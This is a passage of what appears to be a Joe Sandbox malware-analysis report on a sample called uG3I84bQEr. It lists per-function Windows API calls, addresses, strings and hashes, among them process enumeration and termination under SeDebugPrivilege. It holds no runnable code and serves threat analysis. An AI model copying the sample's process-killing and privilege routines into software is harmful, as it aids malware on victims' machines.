                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                            • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                            • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                            • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-2080382077
                                                            • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                            • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                            • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                            • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                            APIs
                                                            • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                            • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                            • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                            • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                              • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                              • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                              • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                            • GetDC.USER32 ref: 0043CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                            • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                            • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                            • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                            APIs
                                                            • RtlDecodePointer.NTDLL(00000000), ref: 00B91A3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: DecodePointer
                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                            • API String ID: 3527080286-3064271455
                                                            • Opcode ID: fbfede862f78b4c162e12f0244f8d119e123ed2a84a860dc920b17825eb1327a
                                                            • Instruction ID: 1d4c50cb48c41576833947adf5bf93690fc0244eefc98c8886e527e58e1dfe90
                                                            • Opcode Fuzzy Hash: fbfede862f78b4c162e12f0244f8d119e123ed2a84a860dc920b17825eb1327a
                                                            • Instruction Fuzzy Hash: 1F514971A0450BCBDF109F6CEA881ADBBF1FF4A310F2009E5E441AB264DB758E24EB54
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                            • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                            • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                            • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                            APIs
                                                              • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                              • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                              • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                            • _wcscmp.LIBCMT ref: 00464D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                            • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                            • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                            • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                            • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                            • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                            • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                            • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                            • DestroyIcon.USER32(?), ref: 0043C3AB
                                                              • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                            • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                            • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                            • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                            • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                            • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                            • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                            • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                            • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                            • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                            • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                            • _wcscat.LIBCMT ref: 00486EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                            • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                            • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                            • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                            APIs
                                                              • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                              • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                              • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                            • GetLastError.KERNEL32 ref: 0047E9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                            • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                            • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                            • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                            • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                            • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                            • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                            • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                            • LoadStringW.USER32(00000000), ref: 00464319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                            • LoadStringW.USER32(00000000), ref: 00464336
                                                            • _wprintf.LIBCMT ref: 0046435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                            • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                            • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                            • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
